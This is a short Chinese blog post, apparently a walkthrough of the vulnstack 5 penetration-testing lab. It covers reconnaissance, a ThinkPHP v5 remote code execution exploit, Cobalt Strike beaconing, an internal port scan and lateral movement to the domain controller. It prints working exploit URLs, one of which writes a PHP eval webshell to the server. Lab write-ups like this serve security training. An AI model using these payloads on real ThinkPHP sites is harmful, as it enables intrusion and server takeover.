vulnstack(五)渗透实战


vulnstack(五)渗透实战


信息收集

先nmap扫描端口:

因为有防火墙的规则,所以没有像网上扫出来的那么多端口,开了80、3306、135等端口

进行dirsearch扫描:

有个add.php,访问看看:

有密码限制,不好爆破。

通过搜索,发现ThinkPHP v5有rce任意代码执行漏洞,

/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3C?php%20@eval($_POST[%27a%27])?%3E

直接蚁剑拿下:

上线cs

成功上线

和vulnstack2一样cs无法执行net view之类的域查看命令

portscan 192.168.138.0-192.168.138.255 1-1024,3389,5000-6000 arp 1024

探活域内另一个主机:192.168.138.138

直接横向移动拿下DC域控:

相较于其他靶场,这个是最简单的


文章作者: 矢坕
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 矢坕 !
  目录